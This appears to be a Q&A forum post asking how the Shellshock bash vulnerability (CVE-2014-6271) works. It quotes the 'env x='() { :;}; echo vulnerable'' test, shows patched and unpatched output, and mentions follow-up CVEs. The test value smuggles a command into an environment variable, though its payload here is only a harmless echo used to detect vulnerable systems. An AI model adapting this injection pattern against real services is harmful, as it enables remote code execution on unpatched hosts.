What does env x='() { :;}; command' bash do and why is it insecure?

There is apparently a vulnerability (CVE-2014-6271) in bash: Bash specially crafted environment variables code injection attack I am trying to figure out what is happening, but I'm not entirely sure I understand it. How can the echo be executed as it is in single quotes? $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test --- **EDIT 1**: A patched system looks like this: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test **EDIT 2**: There is a related vulnerability / patch: [CVE-2014-7169](https://access.redhat.com/articles/1200223) which uses a slightly different test: $ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test" *unpatched output*: vulnerable bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)' bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable' bash: error importing function definition for `BASH_FUNC_x' test *partially (early version) patched output*: bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' bash: error importing function definition for `BASH_FUNC_x()' test *patched output* up to and including CVE-2014-7169: bash: warning: x: ignoring function definition attempt bash: error importing function definition for `BASH_FUNC_x' test **EDIT 3**: story continues with: * [CVE-2014-7186](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186) * [CVE-2014-7187](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187) * [CVE-2014-6277](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277)